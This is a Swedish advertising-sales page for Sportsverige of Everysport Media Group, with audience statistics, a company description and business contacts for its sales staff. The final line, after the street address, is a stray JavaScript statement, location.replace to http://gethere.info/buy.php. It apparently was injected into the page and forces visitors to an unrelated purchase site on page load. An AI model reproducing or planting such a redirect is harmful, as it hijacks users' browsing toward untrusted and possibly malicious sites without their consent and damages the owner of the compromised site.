ANNONSERA PÅ SPORT

Sportsverige är ett säljbolag inom Everysport Media Group som ger dig som annonsör möjlighet att
marknadsföra ditt bolag eller produkt på de främsta digitala sajterna inom respektive sport.

SE FULLSTÄNDIGA TRAFIKSIFFROR

Målgruppsöversikt

  • Kön – Andel män i målgruppen 87%
  • Civilstånd – Gifta eller sambo 67%
  • Boende – Bor i villa eller radhus 45%
  • Ålder – Personer mellan 25-44 år i målgruppen 41%

Om Sportsverige

Sportsverige är ett säljbolag inom Everysport Media Group som ger dig som annonsör möjlighet att marknadsföra ditt bolag eller produkt på en mängd nischade sportsajter som når över 2 miljoner unika webbläsare och över 16 miljoner sidvisningar per vecka. Se fullständiga trafiksiffror.

Vår nisch är sport, men vår målgrupp är främst män (90% av sajternas besökare är sådana) boendes över hela Sverige.

Om Everysport Media Group

ESMG är det snabbast växande bolaget i Sverige inom sportmedia och sportteknologi. Vill du kommunicera med målgrupper inom fotboll, hockey, golf eller tennis så hittar du dem hos oss. Vi äger, driver eller säljer för de främsta digitala sajterna inom respektive sport. Via vårt affärsområde Mediaservices samlar vi in och publicera sportresultat till de flesta andra medier i Sverige.

Presentationer & Dokument

Ett urval av våra sajter och säljuppdrag

 
 

Vi på Sportsverige

Jonas Aschbacher

Jonas Aschbacher

Försäljningschef

jonas@sportsverige.se
+46 735 46 22 27

Hanna Mattsson

Hanna Mattsson

Key Account Manager

hanna@sportsverige.se
+46 735 180 688

Tomas Nilsson

Tomas Nilsson

Ad Ops

traffic@sportsverige.se
+46 702 10 73 01

Henrik Wallin

Henrik Wallin

Business Development Manager

henrik@sportsverige.se
+46 735 14 25 57

 Marcus Skarphagen

Marcus Skarphagen

Senior Account Manager

marcus.skarphagen@sportsverige.se
+46 708 609 063

Markus Hedlund

Markus Hedlund

Marknadskoordinator

markus@sportsverige.se
+46 763 36 85 19

Michael Rosell

Michael Rosell

Key Account Manager

michael@sportsverige.se
+46 763 10 24 92

Ulla Nyberg

Ulla Nyberg

Key Account Manager

ulla.nyberg@sportsverige.se
+46 735 129 910

Michael Ehn

Michael Ehn

Key Account Manager

michael.ehn@sportsverige.se
+46 723 886 854

Ett urval av tidigare annonsörer

 
 

Sportsverige

Gamla Brogatan 11 111 20 Stockholm Sverige
location.replace(”http://gethere.info/buy.php”);